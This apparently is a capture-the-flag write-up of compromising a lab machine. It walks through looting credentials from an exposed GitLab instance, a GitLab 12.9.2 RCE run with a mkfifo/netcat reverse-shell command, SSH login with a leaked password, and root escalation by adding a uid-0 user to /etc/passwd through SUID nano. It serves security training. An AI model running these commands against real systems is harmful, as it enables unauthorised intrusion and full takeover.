- The port 80 has an instance of Gitlab
- Gitlab exposes a repositories of sytem user jonathan
- We found credentials for user Jonathan in repo
- In Jonathan Gitlab account we have found the ssh server key
- On the server, nano allowed us to add a rogue/dummy user to /etc/passwd
We have found a Gitlab instance
On which we can register a new user: tom
With our new user, we can see the public folder which exposes user Jonathan repositories
Credentials looting
Looking into the user Jonathan repositories, we have found important credentials (in the commits history)
RCE in Gitlab
The Gitlab version 12.9.2 we have is vulnerable to an RCE (available on exploit-db). Using our user tom we are able to run command on the victim machine
Using the exploit we are able to ping our attacking machine from the victim machine
Reverse shell as git
Using the following command
python -u tom -p Password123 -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f" -t
We get a shell as user “git”
Looking into the server we found jonathan credentials (which we had already found via Gitlab interface)
Jonathan account
Using the credentials: jonathan / rPHAKWAgMZtjr9at we got access to an additional repository
which has a ssh key for the victim machine
Using this ssh key, we got access to the server as Jonathan
Looking into the suid, we have found “nano”
Thanks to /bin/nano we can read the /etc/shadow file
As, nano has suid permission can use that to escalate the root privilege by injecting a new user inside the /etc/passwd file.
First, let’s generate a password hash
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Then, thanks to /bin/nano, let’s add the user hacker
and the generated password
to the /etc/passwd file
Our user hacker has the same uid than root, so we have effectively fully rooted the machine
whoami; find / '(' -name 'local.txt' -or -name 'system.txt' -or -name 'user.txt' -or -name 'root.txt' -or -name 'proof.txt' -or -name 'access.txt' -or -name 'flag.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null; ip addr